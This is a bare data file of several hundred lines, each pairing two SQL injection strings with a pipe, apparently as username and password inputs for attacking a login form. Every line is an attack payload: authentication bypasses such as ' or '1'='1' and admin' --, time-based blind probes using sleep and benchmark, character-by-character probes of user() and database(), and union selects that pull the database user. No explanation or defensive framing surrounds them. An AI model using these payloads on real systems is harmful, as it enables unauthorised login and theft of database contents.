") or ("1"="1 | or 1=1
admin' -- | " or exists(select * from users)--
' or benchmark(1000000,md5(1))-- | ' or benchmark(1000000,md5(1))--
or 1=1-- | " or exists(select * from users)--
' or ascii(substr((select user()),1,1))>64-- | ' or exists(select * from users)--
" or true-- | " or ascii(substr((select database()),1,1))>64--
' or true-- | ') or ('1'='1
' or benchmark(1000000,md5(1))-- | ' or '1'='1'
" or sleep(3)-- | or 1=1
admin' -- | ' or benchmark(1000000,md5(1))--
' or '1'='1' | ") or ("1"="1
" or exists(select * from users)-- | or 1=1
' union select null, user()-- | ' or exists(select * from users)--
' or benchmark(1000000,md5(1))-- | or 1=1
' or benchmark(1000000,md5(1))-- | " or benchmark(1000000,md5(1))--
" or benchmark(1000000,md5(1))-- | or 1=1--
') or ('1'='1 | admin" --
" or true-- | " or "1"="1
" union select null, user()-- | ' union select null, user()--
' or '1'='1' | ') or ('1'='1
' or true-- | " union select null, user()--
" union select null, user()-- | " or true--
" or ascii(substr((select database()),1,1))>64-- | " union select null, user()--
' or '1'='1' | " or sleep(3)--
" or sleep(3)-- | ' or ascii(substr((select user()),1,1))>64--
' or ''=' | ") or ("1"="1
' or ''=' | or 1=1--
' or ascii(substr((select user()),1,1))>64-- | " or true--
') or ('1'='1 | ' union select null, user()--
admin" -- | " or "1"="1
" or benchmark(1000000,md5(1))-- | ' or '1'='1'
" or true-- | ' or true--
" or benchmark(1000000,md5(1))-- | admin' --
admin' -- | ' or benchmark(1000000,md5(1))--
or 1=1-- | ' or exists(select * from users)--
" or true-- | ' or '1'='1'
' or true-- | ' or sleep(3)--
admin" -- | ' or exists(select * from users)--
' or ''=' | ' or '1'='1'
' or ''=' | ' or benchmark(1000000,md5(1))--
" or true-- | admin" --
' or '1'='1' | " union select null, user()--
" or "1"="1 | " or exists(select * from users)--
or 1=1-- | ' or ascii(substr((select user()),1,1))>64--
admin" -- | ' or ''='
admin' -- | " or exists(select * from users)--
" or sleep(3)-- | " or ascii(substr((select database()),1,1))>64--
' union select null, user()-- | ' or benchmark(1000000,md5(1))--
or 1=1-- | " or benchmark(1000000,md5(1))--
") or ("1"="1 | " or benchmark(1000000,md5(1))--
" or exists(select * from users)-- | ' or sleep(3)--
' or '1'='1' | ') or ('1'='1
' or ascii(substr((select user()),1,1))>64-- | ' union select null, user()--
or 1=1-- | " or ascii(substr((select database()),1,1))>64--
or 1=1 | " or exists(select * from users)--
' or ascii(substr((select user()),1,1))>64-- | ' or ascii(substr((select user()),1,1))>64--
") or ("1"="1 | ' or ascii(substr((select user()),1,1))>64--
" or ascii(substr((select database()),1,1))>64-- | ' or ascii(substr((select user()),1,1))>64--
') or ('1'='1 | admin" --
or 1=1-- | ' or ''='
" or true-- | ") or ("1"="1
" or exists(select * from users)-- | ") or ("1"="1
or 1=1 | ") or ("1"="1
or 1=1-- | ') or ('1'='1
' or benchmark(1000000,md5(1))-- | ' or benchmark(1000000,md5(1))--
" union select null, user()-- | " or sleep(3)--
" or true-- | ") or ("1"="1
" or "1"="1 | " or benchmark(1000000,md5(1))--
" or exists(select * from users)-- | ' or true--
admin" -- | ') or ('1'='1
" or exists(select * from users)-- | ' or sleep(3)--
or 1=1 | ") or ("1"="1
" or true-- | ' union select null, user()--
' or benchmark(1000000,md5(1))-- | or 1=1--
" or benchmark(1000000,md5(1))-- | ' or benchmark(1000000,md5(1))--
' or benchmark(1000000,md5(1))-- | ' or true--
" or true-- | or 1=1
or 1=1 | ') or ('1'='1
' or '1'='1' | or 1=1
' or true-- | admin' --
' or benchmark(1000000,md5(1))-- | ' or ascii(substr((select user()),1,1))>64--
" or sleep(3)-- | ') or ('1'='1
or 1=1 | or 1=1--
" or sleep(3)-- | " or true--
" or true-- | admin' --
" or exists(select * from users)-- | ' or sleep(3)--
' or benchmark(1000000,md5(1))-- | ' or exists(select * from users)--
" or ascii(substr((select database()),1,1))>64-- | ' or ascii(substr((select user()),1,1))>64--
' union select null, user()-- | admin' --
admin" -- | " or sleep(3)--
' or '1'='1' | admin' --
' or sleep(3)-- | " or ascii(substr((select database()),1,1))>64--
' or ''=' | ' or ascii(substr((select user()),1,1))>64--
' union select null, user()-- | ' or sleep(3)--
or 1=1 | " or benchmark(1000000,md5(1))--
' or true-- | ' or sleep(3)--
" or ascii(substr((select database()),1,1))>64-- | " or true--
' or ''=' | ' or ascii(substr((select user()),1,1))>64--
admin' -- | admin' --
" or ascii(substr((select database()),1,1))>64-- | ") or ("1"="1
" or ascii(substr((select database()),1,1))>64-- | ") or ("1"="1
" or ascii(substr((select database()),1,1))>64-- | ') or ('1'='1
' or ascii(substr((select user()),1,1))>64-- | ' or sleep(3)--
or 1=1 | ' union select null, user()--
' union select null, user()-- | ' or sleep(3)--
') or ('1'='1 | ' or ''='
' or sleep(3)-- | ' or ascii(substr((select user()),1,1))>64--
' or '1'='1' | ' or ''='
' or ascii(substr((select user()),1,1))>64-- | " or true--
" or sleep(3)-- | ' or sleep(3)--
' or ''=' | " or benchmark(1000000,md5(1))--
admin' -- | admin' --
admin' -- | " union select null, user()--
admin" -- | ") or ("1"="1
' union select null, user()-- | ' or ''='
admin" -- | ' or '1'='1'
" or sleep(3)-- | admin" --
" or true-- | " or ascii(substr((select database()),1,1))>64--
" or "1"="1 | " or benchmark(1000000,md5(1))--
' or true-- | " or benchmark(1000000,md5(1))--
" or sleep(3)-- | " union select null, user()--
" or exists(select * from users)-- | or 1=1
or 1=1 | admin' --
" or "1"="1 | " or ascii(substr((select database()),1,1))>64--
" or true-- | ') or ('1'='1
admin" -- | ") or ("1"="1
or 1=1-- | ' or benchmark(1000000,md5(1))--
' or ''=' | ' or sleep(3)--
' or exists(select * from users)-- | " union select null, user()--
' or exists(select * from users)-- | ") or ("1"="1
" or ascii(substr((select database()),1,1))>64-- | admin' --
" union select null, user()-- | " or sleep(3)--
' or ascii(substr((select user()),1,1))>64-- | ' or ''='
" or benchmark(1000000,md5(1))-- | ' or ascii(substr((select user()),1,1))>64--
' or true-- | " union select null, user()--
admin" -- | ' or ascii(substr((select user()),1,1))>64--
' union select null, user()-- | ") or ("1"="1
" or "1"="1 | ' or '1'='1'
' union select null, user()-- | " or sleep(3)--
" or ascii(substr((select database()),1,1))>64-- | ' or '1'='1'
' or sleep(3)-- | admin" --
" or sleep(3)-- | or 1=1--
' or benchmark(1000000,md5(1))-- | ") or ("1"="1
admin' -- | admin' --
' or exists(select * from users)-- | ' or '1'='1'
" union select null, user()-- | ' or ascii(substr((select user()),1,1))>64--
" or true-- | " union select null, user()--
' or exists(select * from users)-- | ' or ''='
' or sleep(3)-- | admin" --
' or ''=' | or 1=1--
admin" -- | " or ascii(substr((select database()),1,1))>64--
' or benchmark(1000000,md5(1))-- | admin' --
admin" -- | ") or ("1"="1
or 1=1-- | ' or ''='
" or exists(select * from users)-- | ' union select null, user()--
' or ''=' | ' or exists(select * from users)--
" or ascii(substr((select database()),1,1))>64-- | ' or exists(select * from users)--
" or sleep(3)-- | " or "1"="1
or 1=1-- | ' or exists(select * from users)--
' or sleep(3)-- | ' or ascii(substr((select user()),1,1))>64--
" or benchmark(1000000,md5(1))-- | admin" --
" or sleep(3)-- | " or benchmark(1000000,md5(1))--
" or ascii(substr((select database()),1,1))>64-- | ' or true--
admin' -- | or 1=1--
" or "1"="1 | or 1=1
' or ascii(substr((select user()),1,1))>64-- | ' or exists(select * from users)--
" or sleep(3)-- | ' or ''='
" or sleep(3)-- | ' or benchmark(1000000,md5(1))--
or 1=1 | ' union select null, user()--
" or true-- | " or exists(select * from users)--
' or exists(select * from users)-- | or 1=1
' or ascii(substr((select user()),1,1))>64-- | " or exists(select * from users)--
' or benchmark(1000000,md5(1))-- | ' or true--
' or exists(select * from users)-- | ' or ascii(substr((select user()),1,1))>64--
admin' -- | ' or ascii(substr((select user()),1,1))>64--
' or true-- | ' or ''='
' or exists(select * from users)-- | " or ascii(substr((select database()),1,1))>64--
admin' -- | admin" --
' or true-- | ' or benchmark(1000000,md5(1))--
" or sleep(3)-- | " or benchmark(1000000,md5(1))--
") or ("1"="1 | ' or true--
' or sleep(3)-- | ") or ("1"="1
' or ascii(substr((select user()),1,1))>64-- | ') or ('1'='1
' union select null, user()-- | " or exists(select * from users)--
") or ("1"="1 | admin' --
" union select null, user()-- | " union select null, user()--
" or sleep(3)-- | " or exists(select * from users)--
" or sleep(3)-- | " or exists(select * from users)--
" or exists(select * from users)-- | " union select null, user()--
or 1=1-- | ' or true--
admin' -- | " or "1"="1
' or exists(select * from users)-- | ' or ascii(substr((select user()),1,1))>64--
' or exists(select * from users)-- | " or sleep(3)--
" or true-- | ') or ('1'='1
' or true-- | " or benchmark(1000000,md5(1))--
admin' -- | " or exists(select * from users)--
" or true-- | ' or ascii(substr((select user()),1,1))>64--
") or ("1"="1 | " or exists(select * from users)--
' or '1'='1' | " or true--
' or ''=' | ' or true--
or 1=1-- | ") or ("1"="1
' or benchmark(1000000,md5(1))-- | ' or ascii(substr((select user()),1,1))>64--
admin' -- | admin' --
' or exists(select * from users)-- | ") or ("1"="1
' or sleep(3)-- | ' union select null, user()--
') or ('1'='1 | ' or '1'='1'
" or benchmark(1000000,md5(1))-- | ' or benchmark(1000000,md5(1))--
or 1=1 | " or sleep(3)--
' or exists(select * from users)-- | ' union select null, user()--
' or exists(select * from users)-- | admin' --
admin" -- | ") or ("1"="1
' or sleep(3)-- | ' or ''='
' or true-- | " or true--
" or ascii(substr((select database()),1,1))>64-- | " or "1"="1
' or true-- | " union select null, user()--
' or exists(select * from users)-- | " or exists(select * from users)--
' or ascii(substr((select user()),1,1))>64-- | ' or true--
admin' -- | admin" --
" or "1"="1 | ' or true--
" or sleep(3)-- | ' union select null, user()--
' or ''=' | ' or ascii(substr((select user()),1,1))>64--
' or ''=' | " or benchmark(1000000,md5(1))--
" or exists(select * from users)-- | ' or sleep(3)--
" or exists(select * from users)-- | ") or ("1"="1
" or true-- | " or exists(select * from users)--
' or exists(select * from users)-- | " or ascii(substr((select database()),1,1))>64--
' or '1'='1' | ' or sleep(3)--
or 1=1 | ' or sleep(3)--
" or ascii(substr((select database()),1,1))>64-- | or 1=1
or 1=1-- | ' or exists(select * from users)--
" union select null, user()-- | or 1=1
admin" -- | admin' --
" or ascii(substr((select database()),1,1))>64-- | " or ascii(substr((select database()),1,1))>64--
" or exists(select * from users)-- | " or benchmark(1000000,md5(1))--
' or sleep(3)-- | " or true--
' or exists(select * from users)-- | ' or sleep(3)--
" or sleep(3)-- | " union select null, user()--
' or '1'='1' | ' union select null, user()--
' or ''=' | ' or true--
" or ascii(substr((select database()),1,1))>64-- | " union select null, user()--
') or ('1'='1 | ' or benchmark(1000000,md5(1))--
' or exists(select * from users)-- | ") or ("1"="1
' or sleep(3)-- | ' or ''='
' union select null, user()-- | or 1=1
' or exists(select * from users)-- | " or sleep(3)--
' or exists(select * from users)-- | ') or ('1'='1
' or sleep(3)-- | ' or benchmark(1000000,md5(1))--
' or true-- | ' union select null, user()--
' or ascii(substr((select user()),1,1))>64-- | " or benchmark(1000000,md5(1))--
" or benchmark(1000000,md5(1))-- | " or "1"="1
') or ('1'='1 | ' or ''='
") or ("1"="1 | ') or ('1'='1
" or ascii(substr((select database()),1,1))>64-- | " union select null, user()--
" or benchmark(1000000,md5(1))-- | " or benchmark(1000000,md5(1))--
" or sleep(3)-- | " or "1"="1
' or ''=' | ' or exists(select * from users)--
' or true-- | " or sleep(3)--
') or ('1'='1 | ' or true--
" or ascii(substr((select database()),1,1))>64-- | " or sleep(3)--
' or exists(select * from users)-- | " or true--
" or ascii(substr((select database()),1,1))>64-- | " or exists(select * from users)--
' or exists(select * from users)-- | admin" --
" union select null, user()-- | ' union select null, user()--
' union select null, user()-- | ' union select null, user()--
or 1=1 | ' or ''='
admin' -- | ' or exists(select * from users)--
' or sleep(3)-- | " or "1"="1
' union select null, user()-- | ' or sleep(3)--
admin' -- | ' or true--
" or benchmark(1000000,md5(1))-- | admin' --
admin' -- | ' or benchmark(1000000,md5(1))--
or 1=1 | admin' --
' or '1'='1' | ' or ascii(substr((select user()),1,1))>64--
' or sleep(3)-- | admin" --
") or ("1"="1 | or 1=1--
admin' -- | " or true--
' or '1'='1' | admin' --
' or ascii(substr((select user()),1,1))>64-- | ' or exists(select * from users)--
" or true-- | or 1=1--
" or ascii(substr((select database()),1,1))>64-- | " union select null, user()--
" or exists(select * from users)-- | ') or ('1'='1
' or ''=' | " or true--
" union select null, user()-- | " or exists(select * from users)--
' or sleep(3)-- | " or exists(select * from users)--
' or sleep(3)-- | ' union select null, user()--
" or benchmark(1000000,md5(1))-- | ') or ('1'='1
" union select null, user()-- | admin' --
or 1=1-- | admin" --
" or benchmark(1000000,md5(1))-- | " or true--
or 1=1-- | " or sleep(3)--
" or "1"="1 | ' or ''='
" or exists(select * from users)-- | ' or exists(select * from users)--
" union select null, user()-- | ' or ''='
" union select null, user()-- | " or "1"="1
' or ''=' | ' or ascii(substr((select user()),1,1))>64--
" or benchmark(1000000,md5(1))-- | " or "1"="1
' or '1'='1' | ' union select null, user()--
" or true-- | ") or ("1"="1
" or true-- | or 1=1
" or "1"="1 | " or "1"="1
' or ascii(substr((select user()),1,1))>64-- | ') or ('1'='1
' or exists(select * from users)-- | or 1=1--
" or benchmark(1000000,md5(1))-- | " or sleep(3)--
' or benchmark(1000000,md5(1))-- | ') or ('1'='1
" or sleep(3)-- | " union select null, user()--
") or ("1"="1 | admin" --
admin' -- | admin' --
" or sleep(3)-- | ' or ''='
" or sleep(3)-- | " or sleep(3)--
') or ('1'='1 | admin" --
' or true-- | " or true--
" or exists(select * from users)-- | ' or '1'='1'
" or ascii(substr((select database()),1,1))>64-- | ' union select null, user()--
" or ascii(substr((select database()),1,1))>64-- | " or exists(select * from users)--
' or true-- | " or ascii(substr((select database()),1,1))>64--
admin" -- | ' or benchmark(1000000,md5(1))--
or 1=1 | ' union select null, user()--
' union select null, user()-- | ") or ("1"="1
' or sleep(3)-- | ' or ''='
" or benchmark(1000000,md5(1))-- | ' or benchmark(1000000,md5(1))--
' or exists(select * from users)-- | " or sleep(3)--
" union select null, user()-- | ' or exists(select * from users)--
' or benchmark(1000000,md5(1))-- | " or ascii(substr((select database()),1,1))>64--
' or exists(select * from users)-- | " or true--
' or benchmark(1000000,md5(1))-- | ' or ''='
' or ''=' | ' or true--
' or benchmark(1000000,md5(1))-- | ") or ("1"="1
" union select null, user()-- | " or benchmark(1000000,md5(1))--
" or benchmark(1000000,md5(1))-- | or 1=1--
" or ascii(substr((select database()),1,1))>64-- | " or true--
" or sleep(3)-- | ' or '1'='1'
" union select null, user()-- | " or benchmark(1000000,md5(1))--
admin' -- | ' or benchmark(1000000,md5(1))--
" or "1"="1 | ') or ('1'='1
" union select null, user()-- | " or ascii(substr((select database()),1,1))>64--
' or ascii(substr((select user()),1,1))>64-- | " or benchmark(1000000,md5(1))--
') or ('1'='1 | ' or '1'='1'
" or benchmark(1000000,md5(1))-- | or 1=1--
') or ('1'='1 | admin" --
") or ("1"="1 | ' or exists(select * from users)--
" union select null, user()-- | admin" --
' or true-- | or 1=1--
admin" -- | " or exists(select * from users)--
' or exists(select * from users)-- | " or true--
or 1=1-- | " union select null, user()--
' or sleep(3)-- | " or benchmark(1000000,md5(1))--
' or true-- | ' or ascii(substr((select user()),1,1))>64--
" or exists(select * from users)-- | " or benchmark(1000000,md5(1))--
or 1=1 | ' or ascii(substr((select user()),1,1))>64--
' or exists(select * from users)-- | or 1=1
" or "1"="1 | ") or ("1"="1
' or exists(select * from users)-- | admin" --
" or sleep(3)-- | ' or ascii(substr((select user()),1,1))>64--
' or ascii(substr((select user()),1,1))>64-- | ' or sleep(3)--
or 1=1 | " union select null, user()--
" or "1"="1 | ' or ''='
' or sleep(3)-- | " or ascii(substr((select database()),1,1))>64--
or 1=1-- | admin" --
" or true-- | " or true--
' or benchmark(1000000,md5(1))-- | ') or ('1'='1
' or sleep(3)-- | " or ascii(substr((select database()),1,1))>64--
" or sleep(3)-- | ") or ("1"="1
' or ''=' | or 1=1
or 1=1 | or 1=1
" or exists(select * from users)-- | " or ascii(substr((select database()),1,1))>64--
or 1=1 | ") or ("1"="1
' or benchmark(1000000,md5(1))-- | ') or ('1'='1
' or benchmark(1000000,md5(1))-- | ' or ascii(substr((select user()),1,1))>64--
') or ('1'='1 | ") or ("1"="1
') or ('1'='1 | ' or exists(select * from users)--
' or exists(select * from users)-- | " or benchmark(1000000,md5(1))--
" or benchmark(1000000,md5(1))-- | ' or ascii(substr((select user()),1,1))>64--
" union select null, user()-- | ' or ''='
' or true-- | or 1=1--
admin" -- | admin' --
' union select null, user()-- | or 1=1--
" or true-- | ' or true--
admin' -- | ' or true--
' or ascii(substr((select user()),1,1))>64-- | " or exists(select * from users)--
" or exists(select * from users)-- | ' or ''='
" or exists(select * from users)-- | ' or benchmark(1000000,md5(1))--
' or ascii(substr((select user()),1,1))>64-- | ' or sleep(3)--
') or ('1'='1 | ' union select null, user()--
") or ("1"="1 | ' or sleep(3)--
' or ascii(substr((select user()),1,1))>64-- | ' or exists(select * from users)--
or 1=1 | " or exists(select * from users)--
" or "1"="1 | ' or true--
admin" -- | " or true--
admin" -- | " union select null, user()--
" or benchmark(1000000,md5(1))-- | ') or ('1'='1
") or ("1"="1 | " or true--
') or ('1'='1 | " union select null, user()--
or 1=1-- | ' or benchmark(1000000,md5(1))--
") or ("1"="1 | ") or ("1"="1
" union select null, user()-- | ' union select null, user()--
' or ascii(substr((select user()),1,1))>64-- | or 1=1--
' or ''=' | ' or exists(select * from users)--
" or "1"="1 | " or benchmark(1000000,md5(1))--
' or true-- | ' or exists(select * from users)--
' or sleep(3)-- | ") or ("1"="1
" or sleep(3)-- | ") or ("1"="1
" or benchmark(1000000,md5(1))-- | admin' --
" or benchmark(1000000,md5(1))-- | " or sleep(3)--
' or ''=' | " or exists(select * from users)--
or 1=1-- | ' or ascii(substr((select user()),1,1))>64--
or 1=1 | ' or '1'='1'
' or ascii(substr((select user()),1,1))>64-- | ' or '1'='1'
admin' -- | ' or ''='
' or true-- | " or benchmark(1000000,md5(1))--
' or exists(select * from users)-- | admin' --
' or ''=' | ") or ("1"="1
' or sleep(3)-- | ' or sleep(3)--
" union select null, user()-- | " union select null, user()--
admin' -- | " or "1"="1
") or ("1"="1 | " or true--
' or benchmark(1000000,md5(1))-- | " or benchmark(1000000,md5(1))--
or 1=1 | admin' --
' or ''=' | or 1=1
admin" -- | ' or ''='
" or "1"="1 | ' or exists(select * from users)--
') or ('1'='1 | " or sleep(3)--
") or ("1"="1 | ' or sleep(3)--
") or ("1"="1 | ' or true--
" or sleep(3)-- | " or ascii(substr((select database()),1,1))>64--
' or ascii(substr((select user()),1,1))>64-- | ' or true--
' or benchmark(1000000,md5(1))-- | or 1=1
" union select null, user()-- | ') or ('1'='1
' or ''=' | " union select null, user()--
admin" -- | " or true--
' or exists(select * from users)-- | ") or ("1"="1
') or ('1'='1 | ") or ("1"="1
' or '1'='1' | ' union select null, user()--
admin' -- | ' or exists(select * from users)--
admin" -- | admin" --
" or sleep(3)-- | " union select null, user()--
" union select null, user()-- | ") or ("1"="1
' or sleep(3)-- | " or "1"="1
or 1=1 | ") or ("1"="1
') or ('1'='1 | " or sleep(3)--
' or benchmark(1000000,md5(1))-- | ') or ('1'='1
" union select null, user()-- | ' union select null, user()--
" or true-- | ' union select null, user()--
" or exists(select * from users)-- | admin' --
" union select null, user()-- | " or exists(select * from users)--
' union select null, user()-- | " union select null, user()--
or 1=1 | ' or exists(select * from users)--
" union select null, user()-- | admin" --
' or ascii(substr((select user()),1,1))>64-- | ' or exists(select * from users)--
" or exists(select * from users)-- | ") or ("1"="1
or 1=1-- | or 1=1--
" or exists(select * from users)-- | ' union select null, user()--
') or ('1'='1 | ' or benchmark(1000000,md5(1))--
') or ('1'='1 | ' or ''='
' or '1'='1' | " or "1"="1
') or ('1'='1 | " union select null, user()--
' or ''=' | ' or exists(select * from users)--
or 1=1-- | admin" --
" or exists(select * from users)-- | ' union select null, user()--
" or sleep(3)-- | ' union select null, user()--
") or ("1"="1 | ' or exists(select * from users)--
") or ("1"="1 | ' or benchmark(1000000,md5(1))--
" or benchmark(1000000,md5(1))-- | " or exists(select * from users)--
' or sleep(3)-- | " or ascii(substr((select database()),1,1))>64--
") or ("1"="1 | or 1=1
' or ''=' | " or benchmark(1000000,md5(1))--
or 1=1-- | ") or ("1"="1
' or exists(select * from users)-- | " or sleep(3)--
" or exists(select * from users)-- | ' or benchmark(1000000,md5(1))--
' or ''=' | " or "1"="1
admin" -- | " or "1"="1
" union select null, user()-- | ') or ('1'='1
' union select null, user()-- | or 1=1--
' or ascii(substr((select user()),1,1))>64-- | admin" --
or 1=1 | " or exists(select * from users)--
or 1=1-- | " or ascii(substr((select database()),1,1))>64--
or 1=1 | ' or ''='
' or '1'='1' | ' or benchmark(1000000,md5(1))--
' or benchmark(1000000,md5(1))-- | ' or ''='
' or ''=' | ') or ('1'='1
or 1=1 | ') or ('1'='1
' or ''=' | or 1=1
or 1=1 | ') or ('1'='1
' or true-- | ' or sleep(3)--
' or true-- | " union select null, user()--
' or ascii(substr((select user()),1,1))>64-- | ') or ('1'='1
' or benchmark(1000000,md5(1))-- | " or exists(select * from users)--
') or ('1'='1 | ' or sleep(3)--
" or benchmark(1000000,md5(1))-- | " union select null, user()--
' or benchmark(1000000,md5(1))-- | ' or sleep(3)--
" or benchmark(1000000,md5(1))-- | or 1=1
" or exists(select * from users)-- | admin" --
admin" -- | " or true--
admin' -- | ') or ('1'='1
or 1=1-- | ' or ''='
' or ''=' | ' or true--
' or sleep(3)-- | ' or ''='
") or ("1"="1 | " or benchmark(1000000,md5(1))--
admin' -- | " or "1"="1
admin' -- | ' or true--
or 1=1 | admin' --
